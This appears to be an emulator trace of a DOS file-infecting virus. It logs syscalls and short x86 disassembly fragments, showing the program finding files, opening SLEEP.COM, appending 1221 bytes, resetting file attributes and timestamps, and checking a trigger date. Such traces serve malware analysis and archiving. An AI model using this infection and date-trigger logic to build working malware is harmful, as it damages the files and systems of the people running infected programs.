2018-12-25T12:03:29.993584219Z 66 PC: 12d19 | Move file pointer (See above)
2018-12-25T12:03:29.996494843Z 64 PC: 12a84 | Write file or device (See above)
2018-12-25T12:03:30.005910576Z 87 PC: 12d33 | Get or set file date and time (See above)
2018-12-25T12:03:30.007309967Z 62 PC: 12d37 | Close file (See above)
2018-12-25T12:03:30.015118174Z 67 PC: 12d4a | Get or set file attributes (See above)
2018-12-25T12:03:30.02530191Z 79 PC: 12c19 | Find next file (See above)
2018-12-25T12:03:30.027948462Z 61 PC: 12c31 | Open file (See above)
2018-12-25T12:03:30.034880407Z 63 PC: 12c43 | Read file or device (See above)
2018-12-25T12:03:30.041549535Z 44 PC: 12cae | Get time (See above)
2018-12-25T12:03:30.043579158Z 67 PC: 12cc8 | Get or set file attributes (See above)
2018-12-25T12:03:30.054949203Z 62 PC: 12ccc | Close file (See above)
2018-12-25T12:03:30.057063428Z 61 PC: 12cd1 | Open file (See above)
2018-12-25T12:03:30.063841312Z 64 PC: 12ce8 | Write file or device (See above)
2018-12-25T12:03:30.067099735Z 64 PC: 12cfb | Write file or device (See above)
2018-12-25T12:03:30.070639546Z 64 PC: 12d10 | Write file or device (See above)
2018-12-25T12:03:30.073440224Z 66 PC: 12d19 | Move file pointer (See above)
2018-12-25T12:03:30.075566821Z 64 PC: 12a84 | Write file or device (See above)
2018-12-25T12:03:30.090876647Z 87 PC: 12d33 | Get or set file date and time (See above)
2018-12-25T12:03:30.092481762Z 62 PC: 12d37 | Close file (See above)
2018-12-25T12:03:30.100017228Z 67 PC: 12d4a | Get or set file attributes (See above)
2018-12-25T12:03:30.110656677Z 42 PC: 12b60 | Get date 0x12b60: cmp dx, 0x606
0x12b64: je 0x12b69
0x12b66: jmp 0x12dba
0x12b69: jmp 0x12d4f
0x12b6c: and ah, bh
0x12b6e: movsw word ptr es:[di], word ptr [si]
0x12b6f: mov ax, 0x5c4c
0x12b72: add word ptr [di], ax
0x12b74: add byte ptr [di - 0x75], dl
0x12b77: in al, dx
0x12b78: sub sp, 0x2c
0x12b7b: push si
0x12b7c: jmp 0x12bed
0x12b7e: mov ah, 0x1a
0x12b80: lea dx, word ptr [bp - 0x2c]
0x12b83: int 0x21
0x12b85: mov ah, 0x4e
0x12b87: mov cx, 0x10
0x12b8a: mov dx, 0x1aa
0x12b8d: add dx, word ptr [0x106]
2018-12-25T12:03:30.113104356Z 59 PC: 12dc5 | Change current directory
2018-12-25T12:03:30.11732729Z 59 PC: 12dcd | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":8112,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:03:30.268026764Z 71 PC: 12b37 | Get current directory
2018-12-25T12:03:30.272010057Z 59 PC: 12b43 | Change current directory
2018-12-25T12:03:30.275830218Z 26 PC: 12bf8 | Set disk transfer address
2018-12-25T12:03:30.277177734Z 78 PC: 12c06 | Find first file
2018-12-25T12:03:30.283444944Z 61 PC: 12c31 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:03:30.290260567Z 63 PC: 12c43 | Read file or device (Read 8 bytes on handle 5)
2018-12-25T12:03:30.296531357Z 44 PC: 12cae | Get time 0x12cae: add dl, dh
0x12cb0: je 0x12caa
0x12cb2: mov si, 0x115
0x12cb5: add si, word ptr [0x106]
0x12cb9: mov byte ptr [si], dl
0x12cbb: mov ax, 0x4301
0x12cbe: xor cx, cx
0x12cc0: mov dx, si
0x12cc2: add dx, 0xbc
0x12cc6: int 0x21
0x12cc8: mov ah, 0x3e
0x12cca: int 0x21
0x12ccc: mov ax, 0x3d02
0x12ccf: int 0x21
0x12cd1: jae 0x12cd6
0x12cd3: jmp 0x12c52
0x12cd6: mov di, dx
0x12cd8: add di, 0x62
0x12cdc: stosw word ptr es:[di], ax
0x12cdd: xchg ax, bx
2018-12-25T12:03:30.298814282Z 67 PC: 12cc8 | Get or set file attributes
2018-12-25T12:03:30.320127203Z 62 PC: 12ccc | Close file
2018-12-25T12:03:30.32250852Z 61 PC: 12cd1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:03:30.328832532Z 64 PC: 12ce8 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:03:30.335883655Z 64 PC: 12cfb | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:03:30.338634628Z 64 PC: 12d10 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:03:30.341349598Z 66 PC: 12d19 | Move file pointer
2018-12-25T12:03:30.344379307Z 64 PC: 12a84 | Write file or device (Write 1221 bytes on handle 5)
2018-12-25T12:03:30.476288654Z 87 PC: 12d33 | Get or set file date and time
2018-12-25T12:03:30.477823943Z 62 PC: 12d37 | Close file
2018-12-25T12:03:30.523303268Z 67 PC: 12d4a | Get or set file attributes
2018-12-25T12:03:30.53327984Z 79 PC: 12c19 | Find next file
2018-12-25T12:03:30.53613141Z 61 PC: 12c31 | Open file (See above)
2018-12-25T12:03:30.544072026Z 63 PC: 12c43 | Read file or device (See above)
2018-12-25T12:03:30.551088416Z 44 PC: 12cae | Get time (See above)
2018-12-25T12:03:30.553432202Z 67 PC: 12cc8 | Get or set file attributes (See above)
2018-12-25T12:03:30.565369698Z 62 PC: 12ccc | Close file (See above)
2018-12-25T12:03:30.567439323Z 61 PC: 12cd1 | Open file (See above)
2018-12-25T12:03:30.574058828Z 64 PC: 12ce8 | Write file or device (See above)
2018-12-25T12:03:30.577196124Z 64 PC: 12cfb | Write file or device (See above)
2018-12-25T12:03:30.580681531Z 64 PC: 12d10 | Write file or device (See above)
2018-12-25T12:03:30.58348376Z 66 PC: 12d19 | Move file pointer (See above)
2018-12-25T12:03:30.585479472Z 64 PC: 12a84 | Write file or device (See above)
2018-12-25T12:03:30.595446047Z 87 PC: 12d33 | Get or set file date and time (See above)
2018-12-25T12:03:30.597085287Z 62 PC: 12d37 | Close file (See above)
2018-12-25T12:03:30.615612824Z 67 PC: 12d4a | Get or set file attributes (See above)
2018-12-25T12:03:30.632092374Z 79 PC: 12c19 | Find next file (See above)
2018-12-25T12:03:30.6349297Z 61 PC: 12c31 | Open file (See above)
2018-12-25T12:03:30.64163199Z 63 PC: 12c43 | Read file or device (See above)
2018-12-25T12:03:30.649071855Z 44 PC: 12cae | Get time (See above)
2018-12-25T12:03:30.651565556Z 67 PC: 12cc8 | Get or set file attributes (See above)
2018-12-25T12:03:30.667577Z 62 PC: 12ccc | Close file (See above)
2018-12-25T12:03:30.670338855Z 61 PC: 12cd1 | Open file (See above)
2018-12-25T12:03:30.677382114Z 64 PC: 12ce8 | Write file or device (See above)
2018-12-25T12:03:30.680419693Z 64 PC: 12cfb | Write file or device (See above)
2018-12-25T12:03:30.68332338Z 64 PC: 12d10 | Write file or device (See above)
2018-12-25T12:03:30.686954162Z 66 PC: 12d19 | Move file pointer (See above)
2018-12-25T12:03:30.688750844Z 64 PC: 12a84 | Write file or device (See above)
2018-12-25T12:03:30.697678473Z 87 PC: 12d33 | Get or set file date and time (See above)
2018-12-25T12:03:30.700264172Z 62 PC: 12d37 | Close file (See above)
2018-12-25T12:03:30.708956007Z 67 PC: 12d4a | Get or set file attributes (See above)
2018-12-25T12:03:30.71887306Z 42 PC: 12b60 | Get date 0x12b60: cmp dx, 0x606
0x12b64: je 0x12b69
0x12b66: jmp 0x12dba
0x12b69: jmp 0x12d4f
0x12b6c: and ah, bh
0x12b6e: movsw word ptr es:[di], word ptr [si]
0x12b6f: mov ax, 0x5c4c
0x12b72: add word ptr [di], ax
0x12b74: add byte ptr [di - 0x75], dl
0x12b77: in al, dx
0x12b78: sub sp, 0x2c
0x12b7b: push si
0x12b7c: jmp 0x12bed
0x12b7e: mov ah, 0x1a
0x12b80: lea dx, word ptr [bp - 0x2c]
0x12b83: int 0x21
0x12b85: mov ah, 0x4e
0x12b87: mov cx, 0x10
0x12b8a: mov dx, 0x1aa
0x12b8d: add dx, word ptr [0x106]
2018-12-25T12:03:30.722229547Z 59 PC: 12dc5 | Change current directory
2018-12-25T12:03:30.726489327Z 59 PC: 12dcd | Change current directory